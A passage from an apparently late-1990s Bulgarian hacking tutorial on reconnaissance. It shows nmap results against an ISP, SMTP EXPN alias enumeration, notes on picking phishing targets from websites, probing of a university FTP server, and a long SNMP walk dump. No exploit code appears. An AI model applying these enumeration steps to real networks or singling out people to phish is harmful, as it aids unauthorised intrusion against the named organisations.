Host unnamed.infotel.bg (212.39.65.224) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.255) appears to be down, skipping it.
Nmap run completed -- 512 IP addresses (75 hosts up) scanned in 15926 seconds
<[Taka... za statistikata - 13 Cisco-ta, 10 Windows-a... Tova kato maluk
provider, kojto nqma da susipva drugite li prilicha? ]>
1.4. sendmail, qmail - mail agenti, versii
Tuk mnogo dobre mozhe da se pozlva komandata EXPN,koqto dava vsicki alias-i
na nqkoj adres ... primer:
Trying 194.12.224.34...
Connected to home.nat.bg.
Escape character is '^]'.
220 home.ntrl.net ESMTP Sendmail My/Config; Sun, 18 Jul 1999 18:59:21 +0300
HELO my.machine.com
250 home.ntrl.net Hello root@doom.damned.net [14.122.25.14], pleased to meet you
EXPN root
250 <postmaster@ntrl.net>
EXPN delian
250 <delian@ntrl.net>
EXPN postmaster
250 <postmaster@ntrl.net>
QUIT
221 home.ntrl.net closing connection
Eto naprimer,kak tuk cqlata poshta na root-a se forward-va kum postmaster-a.
Po tozi nachin mozhe da se vidi koj e userskiq account na root-a, zashtoto
chesto adminite nasochkvat root-skata poshta v sobstvenite si mailbox-ove.
1.5. web - razlichnite uslugi koito se predlagat,
koi site-ove sa hostnati tam, mail-ove na tehnicheski
i administrativni lica (lesni za phish), mrtg, razlichni
BD, dostupni ot web-a (naprimer lotus notes, sistemi
za userite i t.n.)
<[ Tuka za primer moga da dam sistemite na BIA i na Naturella - ottam mozhe
da se vzeme strashno mnogo informaciq za user-a chiito account e izvesten...
Tova vseki, dazhe i pod windows, mozhe da go probva :) ]>
1.6. FTP - annonymous ftp server, otvorena incoming direktoriq,
predpochitani fajlove na ftp servera.
Za primer sum vzel ftp server-a na sofijskiq univesitet (ftp.uni-sofia.bg)
Naprimer pri nego oshte ot nachalo se nabivat na ochi nqkolko neshta,
naprimer che tam stoi ftp.bguug.bg ili negov mirror, kojto obache e na drug
HDD (kato se vlseze v tazi direktoriq, se vizhda lost+found direktoriq,
koqto se suzdava v root dir-a na vseki ext2fs partition). Izglezhda m/u
bguug i uni-sofia ima nqkakva vruzka...
Drugo sushto taka intereson e, che ima 2 direktorii, koito sa public
writeable - incoming i hdd (???), no i 2te direktorii ne sa readable za
ftp user-i.
V pub direktoriqta se otrkivat takiva neshta kato software za MacOS, OS/2,
win31, win95, winNT, dos... Izobshto pub direktoriqta na vsqko uchrezhdenie
dava predstava kakuv software se polzva v nego, zashtoto mnogo rqdko nqkoj
durzhi na ftp-to si neshto, koeto ne se izpolzva. Taka mozhe da se otkrie,
che nqkoj polzva naprimer wingate (ako go ima vuv ftp-to), za kojto wingate
ima hilqda nachnina da se bazikne...
1.7. SNMP - interfejsi,netstat-ove,udoben portscan.Naprava
na karta na mrezhata bazirana na snmp.
Primerna izvadna na SNMP:
system.sysDescr.0 = OCTET STRING: "Linux xxx 2.2.10 i586"
system.sysObjectID.0 = OBJECT IDENTIFIER: enterprises.tubs.ibr.linuxMIB
system.sysUpTime.0 = Timeticks: (42416875) 4 days, 21:49:28
system.sysContact.0 = OCTET STRING: "Not Configured"
system.sysName.0 = OCTET STRING: "xxx" Hex: 65 6F 73
system.sysLocation.0 = OCTET STRING: "Not Configured"
system.sysServices.0 = INTEGER: 72
system.sysORLastChange.0 = Timeticks: (0) 0:00:00
system.sysORTable.sysOREntry.sysORID.1 = OBJECT IDENTIFIER: enterprises.tubs.ibr.linuxMIB.1.1
system.sysORTable.sysOREntry.sysORDescr.1 = OCTET STRING: "LINUX agent"
system.sysORTable.sysOREntry.sysORUpTime.1 = Timeticks: (42416876) 4 days, 21:49:28
<[ identifikaciq na sistemata... uptime, ime, location ]>
interfaces.ifNumber.0 = INTEGER: 9
<[ broj na interface-ite na mashinata... ]>
interfaces.ifTable.ifEntry.ifIndex.1 = INTEGER: 1
interfaces.ifTable.ifEntry.ifIndex.2 = INTEGER: 2
interfaces.ifTable.ifEntry.ifIndex.3 = INTEGER: 3
interfaces.ifTable.ifEntry.ifIndex.4 = INTEGER: 4
interfaces.ifTable.ifEntry.ifIndex.5 = INTEGER: 5
interfaces.ifTable.ifEntry.ifIndex.6 = INTEGER: 6
interfaces.ifTable.ifEntry.ifIndex.7 = INTEGER: 7
interfaces.ifTable.ifEntry.ifIndex.8 = INTEGER: 8
interfaces.ifTable.ifEntry.ifIndex.9 = INTEGER: 9
interfaces.ifTable.ifEntry.ifDescr.1 = OCTET STRING: "lo" Hex: 6C 6F
interfaces.ifTable.ifEntry.ifDescr.2 = OCTET STRING: "eth0" Hex: 65 74 68 30
interfaces.ifTable.ifEntry.ifDescr.3 = OCTET STRING: "dummy0"
interfaces.ifTable.ifEntry.ifDescr.4 = OCTET STRING: "ppp0" Hex: 70 70 70 30
interfaces.ifTable.ifEntry.ifDescr.5 = OCTET STRING: "ppp5" Hex: 70 70 70 35
interfaces.ifTable.ifEntry.ifDescr.6 = OCTET STRING: "ppp1" Hex: 70 70 70 31
interfaces.ifTable.ifEntry.ifDescr.7 = OCTET STRING: "ppp3" Hex: 70 70 70 33
interfaces.ifTable.ifEntry.ifDescr.8 = OCTET STRING: "ppp4" Hex: 70 70 70 34
interfaces.ifTable.ifEntry.ifDescr.9 = OCTET STRING: "ppp2" Hex: 70 70 70 32
<[ tova dotuka e chast ot tablicata s interfejsite, opisvashta imenata im ]>
interfaces.ifTable.ifEntry.ifType.1 = INTEGER: softwareLoopback(24)
interfaces.ifTable.ifEntry.ifType.2 = INTEGER: ethernet-csmacd(6)
interfaces.ifTable.ifEntry.ifType.3 = INTEGER: other(1)
interfaces.ifTable.ifEntry.ifType.4 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.5 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.6 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.7 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.8 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifType.9 = INTEGER: ppp(23)
interfaces.ifTable.ifEntry.ifMtu.1 = INTEGER: 3924
interfaces.ifTable.ifEntry.ifMtu.2 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.3 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.4 = INTEGER: 576
interfaces.ifTable.ifEntry.ifMtu.5 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.6 = INTEGER: 576
interfaces.ifTable.ifEntry.ifMtu.7 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.8 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifMtu.9 = INTEGER: 1500
interfaces.ifTable.ifEntry.ifSpeed.1 = Gauge: 10000000
interfaces.ifTable.ifEntry.ifSpeed.2 = Gauge: 10000000
interfaces.ifTable.ifEntry.ifSpeed.3 = Gauge: 0
interfaces.ifTable.ifEntry.ifSpeed.4 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.5 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.6 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.7 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.8 = Gauge: 28800
interfaces.ifTable.ifEntry.ifSpeed.9 = Gauge: 28800
<[ razlichni parametri ..... ]>
interfaces.ifTable.ifEntry.ifPhysAddress.1 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.2 = OCTET STRING: Hex: 52 54 AB DD 28 47
interfaces.ifTable.ifEntry.ifPhysAddress.3 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.4 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.5 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.6 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.7 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.8 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifPhysAddress.9 = OCTET STRING: Hex: 00 00 00 00 00 00
interfaces.ifTable.ifEntry.ifAdminStatus.1 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.2 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.3 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.4 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.5 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.6 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifAdminStatus.7 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.8 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifAdminStatus.9 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.1 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.2 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.3 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.4 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.5 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.6 = INTEGER: up(1)
interfaces.ifTable.ifEntry.ifOperStatus.7 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.8 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifOperStatus.9 = INTEGER: down(2)
interfaces.ifTable.ifEntry.ifLastChange.1 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.2 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.3 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.4 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.5 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.6 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.7 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.8 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifLastChange.9 = Timeticks: (0) 0:00:00
interfaces.ifTable.ifEntry.ifInOctets.1 = Counter: 176674335
interfaces.ifTable.ifEntry.ifInOctets.2 = Counter: 139040096
interfaces.ifTable.ifEntry.ifInOctets.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInOctets.4 = Counter: 167871867
interfaces.ifTable.ifEntry.ifInOctets.5 = Counter: 3721
interfaces.ifTable.ifEntry.ifInOctets.6 = Counter: 57281
interfaces.ifTable.ifEntry.ifInOctets.7 = Counter: 218308
interfaces.ifTable.ifEntry.ifInOctets.8 = Counter: 31701
interfaces.ifTable.ifEntry.ifInOctets.9 = Counter: 3920
interfaces.ifTable.ifEntry.ifInUcastPkts.1 = Counter: 2160934
interfaces.ifTable.ifEntry.ifInUcastPkts.2 = Counter: 836960
interfaces.ifTable.ifEntry.ifInUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInUcastPkts.4 = Counter: 613948
interfaces.ifTable.ifEntry.ifInUcastPkts.5 = Counter: 107
interfaces.ifTable.ifEntry.ifInUcastPkts.6 = Counter: 2313
interfaces.ifTable.ifEntry.ifInUcastPkts.7 = Counter: 3234
interfaces.ifTable.ifEntry.ifInUcastPkts.8 = Counter: 464
interfaces.ifTable.ifEntry.ifInUcastPkts.9 = Counter: 46
interfaces.ifTable.ifEntry.ifInNUcastPkts.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInNUcastPkts.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInDiscards.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.4 = Counter: 20
interfaces.ifTable.ifEntry.ifInErrors.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.6 = Counter: 2
interfaces.ifTable.ifEntry.ifInErrors.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInErrors.9 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.1 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.2 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.3 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.4 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.5 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.6 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.7 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.8 = Counter: 0
interfaces.ifTable.ifEntry.ifInUnknownProtos.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutOctets.1 = Counter: 176674335
interfaces.ifTable.ifEntry.ifOutOctets.2 = Counter: 237343906
interfaces.ifTable.ifEntry.ifOutOctets.3 = Counter: 1641685
interfaces.ifTable.ifEntry.ifOutOctets.4 = Counter: 35680061
interfaces.ifTable.ifEntry.ifOutOctets.5 = Counter: 3173
interfaces.ifTable.ifEntry.ifOutOctets.6 = Counter: 208146
interfaces.ifTable.ifEntry.ifOutOctets.7 = Counter: 1196797
interfaces.ifTable.ifEntry.ifOutOctets.8 = Counter: 120353
interfaces.ifTable.ifEntry.ifOutOctets.9 = Counter: 4279
interfaces.ifTable.ifEntry.ifOutUcastPkts.1 = Counter: 2160934
interfaces.ifTable.ifEntry.ifOutUcastPkts.2 = Counter: 827267
interfaces.ifTable.ifEntry.ifOutUcastPkts.3 = Counter: 3865
interfaces.ifTable.ifEntry.ifOutUcastPkts.4 = Counter: 556396
interfaces.ifTable.ifEntry.ifOutUcastPkts.5 = Counter: 103
interfaces.ifTable.ifEntry.ifOutUcastPkts.6 = Counter: 2286
interfaces.ifTable.ifEntry.ifOutUcastPkts.7 = Counter: 3688
interfaces.ifTable.ifEntry.ifOutUcastPkts.8 = Counter: 433
interfaces.ifTable.ifEntry.ifOutUcastPkts.9 = Counter: 50
interfaces.ifTable.ifEntry.ifOutNUcastPkts.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.2 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.8 = Counter: 0
interfaces.ifTable.ifEntry.ifOutNUcastPkts.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.2 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.8 = Counter: 0
interfaces.ifTable.ifEntry.ifOutDiscards.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.1 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.2 = Counter: 920
interfaces.ifTable.ifEntry.ifOutErrors.3 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.4 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.5 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.6 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.7 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.8 = Counter: 0
interfaces.ifTable.ifEntry.ifOutErrors.9 = Counter: 0
interfaces.ifTable.ifEntry.ifOutQLen.1 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.2 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.3 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.4 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.5 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.6 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.7 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.8 = Gauge: 0
interfaces.ifTable.ifEntry.ifOutQLen.9 = Gauge: 0
interfaces.ifTable.ifEntry.ifSpecific.1 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.2 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.3 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.4 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.5 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.6 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.7 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.8 = OBJECT IDENTIFIER: .ccitt.0
interfaces.ifTable.ifEntry.ifSpecific.9 = OBJECT IDENTIFIER: .ccitt.0
<[ status na interfejsite ....... ]>
at.atTable.atEntry.atIfIndex.2.1.192.168.0.4 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.194 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.195 = INTEGER: 2
at.atTable.atEntry.atIfIndex.2.1.12.32.42.199 = INTEGER: 2
at.atTable.atEntry.atPhysAddress.2.1.192.168.0.4 = OCTET STRING: Hex: 00 20 AF 3C 07 F7
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.194 = OCTET STRING: Hex: 00 20 AF 90 C9 9E
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.195 = OCTET STRING: Hex: 00 00 21 00 0C 90
at.atTable.atEntry.atPhysAddress.2.1.12.32.42.199 = OCTET STRING: Hex: 00 00 21 00 0C 90
at.atTable.atEntry.atNetAddress.2.1.192.168.0.4 = IpAddress: 192.168.0.4
at.atTable.atEntry.atNetAddress.2.1.12.32.42.194 = IpAddress: 12.32.42.194
at.atTable.atEntry.atNetAddress.2.1.12.32.42.195 = IpAddress: 12.32.42.195
at.atTable.atEntry.atNetAddress.2.1.12.32.42.199 = IpAddress: 12.32.42.199
<[ at - address translation .......... ]>
ip.ipForwarding.0 = INTEGER: forwarding(1)
ip.ipDefaultTTL.0 = INTEGER: 64
ip.ipInReceives.0 = Counter: 4450847
ip.ipInHdrErrors.0 = Counter: 0
ip.ipInAddrErrors.0 = Counter: 0
ip.ipForwDatagrams.0 = Counter: 617086
ip.ipInUnknownProtos.0 = Counter: 0
ip.ipInDiscards.0 = Counter: 0
ip.ipInDelivers.0 = Counter: 2166415
ip.ipOutRequests.0 = Counter: 3754208
ip.ipOutDiscards.0 = Counter: 2063
ip.ipOutNoRoutes.0 = Counter: 0
ip.ipReasmTimeout.0 = INTEGER: 0
ip.ipReasmReqds.0 = Counter: 65
ip.ipReasmOKs.0 = Counter: 32
ip.ipReasmFails.0 = Counter: 0
ip.ipFragOKs.0 = Counter: 100
ip.ipFragFails.0 = Counter: 383
ip.ipFragCreates.0 = Counter: 682
<[ IP opcii ... ]>
ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.127.0.0.1 = IpAddress: 127.0.0.1
ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.12.32.42.193 = IpAddress: 12.32.42.193
ip.ipAddrTable.ipAddrEntry.ipAdEntAddr.14.11.225.193 = IpAddress: 14.11.225.193
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.127.0.0.1 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.12.32.42.193 = INTEGER: 2
ip.ipAddrTable.ipAddrEntry.ipAdEntIfIndex.14.11.15.193 = INTEGER: 3
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.127.0.0.1 = IpAddress: 255.0.0.0
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.12.32.42.193 = IpAddress: 255.255.255.255
ip.ipAddrTable.ipAddrEntry.ipAdEntNetMask.14.11.15.193 = IpAddress: 255.255.255.224
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.127.0.0.1 = INTEGER: 0
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.12.32.42.193 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntBcastAddr.14.11.15.193 = INTEGER: 1
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.127.0.0.1 = INTEGER: 20480
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.12.32.42.193 = INTEGER: 20480
ip.ipAddrTable.ipAddrEntry.ipAdEntReasmMaxSize.14.11.15.193 = INTEGER: 20480
ip.ipRouteTable.ipRouteEntry.ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteDest.192.168.0.0 = IpAddress: 192.168.0.0
ip.ipRouteTable.ipRouteEntry.ipRouteDest.192.168.0.4 = IpAddress: 192.168.0.4
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.27 = IpAddress: 12.32.42.27
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.194 = IpAddress: 12.32.42.194
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.195 = IpAddress: 12.32.42.195
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.196 = IpAddress: 12.32.42.196
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.199 = IpAddress: 12.32.42.199
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.200 = IpAddress: 12.32.42.200
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.202 = IpAddress: 12.32.42.202
ip.ipRouteTable.ipRouteEntry.ipRouteDest.12.32.42.210 = IpAddress: 12.32.42.210
ip.ipRouteTable.ipRouteEntry.ipRouteDest.14.11.15.192 = IpAddress: 14.11.15.192
ip.ipRouteTable.ipRouteEntry.ipRouteDest.14.11.15.200 = IpAddress: 14.11.15.200
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.0.0.0.0 = INTEGER: 4
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.192.168.0.0 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.192.168.0.4 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.27 = INTEGER: 4
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.194 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.195 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.196 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.199 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.200 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.202 = INTEGER: 6
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.12.32.42.210 = INTEGER: 2
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.14.11.15.192 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex.14.11.15.200 = INTEGER: 3
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.0.0.0.0 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.192.168.0.0 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.192.168.0.4 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.27 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.194 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.195 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.196 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.199 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.202 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.12.32.42.210 = INTEGER: 1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.14.11.15.192 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric1.14.11.15.200 = INTEGER: 0
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric2.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.202 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.12.32.42.210 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.14.11.15.192 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric3.14.11.15.200 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.0.0.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.192.168.0.0 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.192.168.0.4 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.27 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.194 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.195 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.196 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.199 = INTEGER: -1
ip.ipRouteTable.ipRouteEntry.ipRouteMetric4.12.32.42.200 = INTEGER: -1
